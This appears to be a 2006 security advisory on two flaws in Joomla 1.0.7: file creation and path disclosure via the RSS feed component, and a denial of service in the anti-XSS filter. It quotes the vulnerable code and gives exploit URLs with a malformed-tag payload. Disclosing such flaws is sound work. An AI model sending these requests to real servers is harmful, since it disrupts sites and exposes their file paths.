joomla.txt

`  
RST/GHC -- JOOMLA CMS -- ADVISORY #37  
Product: Joomla  
Affected version: 1.0.7  
Last version: 1.0.7  
Vendor: Joomla!  
URL: http://www.joomla.org/  
online demo: http://demo.joomla.org/  
VULNERABILITY CLASS: DoS, path disclosing  
  
[Product Description]  
Joomla! is a Content Management System (CMS) created by the same award-winning   
team that brought the Mambo CMS to its current state of stardom.  
  
[Summary]  
An attacker can invoke some undesirable situations for server administrator.  
  
[Details]  
  
1. Real server path disclose and arbitrary filename creation.  
Vulnerable script: includes/feedcreator.class.php  
[code]  
function saveFeed($filename="", $displayContents=true) {  
if ($filename=="") {  
$filename = $this->_generateFilename();  
}  
$feedFile = fopen($filename, "w+");  
if ($feedFile) {  
fputs($feedFile,$this->createFeed());  
fclose($feedFile);  
if ($displayContents) {  
$this->_redirect($filename);  
}  
[/code]  
  
Exploit:   
Vulnerable script: index.php?option=com_rss&feed=filename_here&no_html=1  
An attacker can write simple code to soil the server by lots of cashed files.  
To disclose real path - just put slash symbol in the filename.   
  
2. Denial of service.  
Vulnerable script: includes/phpInputFilter/class.inputfilter.php  
Anti-xss code will not cope with several tags. This can cause denial of servise.  
Exploit:   
index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>  
  
  
[DISCLOSURE TIMELINE]  
  
09/02/06 - vendor notification  
26/02/06 - new release (1.0.8) with bugfix  
  
bugs discovered by Foster  
  
RST/GHC  
http://rst.void.ru  
http://www.ghc.ru  
`